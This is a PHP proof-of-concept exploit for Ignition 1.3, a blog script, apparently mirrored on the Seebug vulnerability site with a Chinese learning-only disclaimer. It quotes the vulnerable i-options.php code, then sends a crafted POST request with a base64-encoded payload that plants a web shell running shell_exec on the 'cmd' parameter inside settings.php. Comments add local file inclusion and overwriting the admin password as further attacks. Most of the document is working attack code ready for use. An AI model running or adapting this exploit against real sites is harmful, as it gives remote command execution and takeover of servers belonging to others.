<?php /* Ignition 1.3 Remote Code Execution Exploit by cOndemned download: http://launchpad.net/ignition/trunk/1.3/+download/ignition-1.3.tar.gz source of i-options.php 1. <?php 2. session_start(); 3. if ($_POST['submit']) { 4. if ($FH = @fopen('data/settings.php', 'w')) { 5. @fwrite($FH, '<?php $pass = "'.$_POST['pass'].'"; 6. $uri = "'.$_POST['uri'].'"; 7. $suri = "'.$_POST['suri'].'"; 8. $blogtitle = "'.$_POST['title'].'"; 9. $description = "'.$_POST['description'].'"; 10. $postid = "'.$_POST['id'].'"; 11. $author = "'.$_POST['author'].'"; 12. $skin = "'.$_POST['skin'].'"; 13. $gravatar = "'.$_POST['gravatar'].'"; 14. $twitter = "' . $_POST['twitter'] . '"; 15. $identica = "' . $_POST['identica'] . '"; 16. $book = "' . $_POST['book'] . '"; 17. $game = "' . $_POST['game'] . '"; 18. $language = "' . $_POST['lang'] . '"; 19. 20. require_once("template.php"); 21. require_once("lang/$language.php");'); 22. #fclose($FH); 23. } We can overwrite setting.php by simply sending specially crafted POST request, and put some evil code into one of the variables. After running my PoC line with $language var will be: $language = "en";echo @shell_exec($_GET['cmd']);$wtf=""; Where "en" is default language and without filling this field correctly admin will see error while trying to access blog index. other attacks scenarios: - attacker can use $_POST['language'] variable to exploit Local File Inclusion (lines 18 and 21) - fill $_POST['pass'] with new password (md5 hashed) to overwrite admins password - etc... */ $target = 'http://localhost/ignition/'; $post = array ( 'uri' => $target, 'suri' => $target, 'description' => 'Just another lame php blog script owned :<', 'skin' => 'default', 'lang' => base64_decode('ZW4iO2VjaG8gQHNoZWxsX2V4ZWMoJF9HRVRbJ2NtZCddKTskd3RmPSI='), 'submit' => 1 ); $sock = curl_init(); curl_setopt_array ( $sock, array ( CURLOPT_URL => "$target/i-options.php", CURLOPT_RETURNTRANSFER => true, CURLOPT_POST => true, CURLOPT_POSTFIELDS => http_build_query($post) ) ); curl_exec($sock); curl_close($sock); echo "Check: $target/data/settings.php?cmd=[system_command]"; ?>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论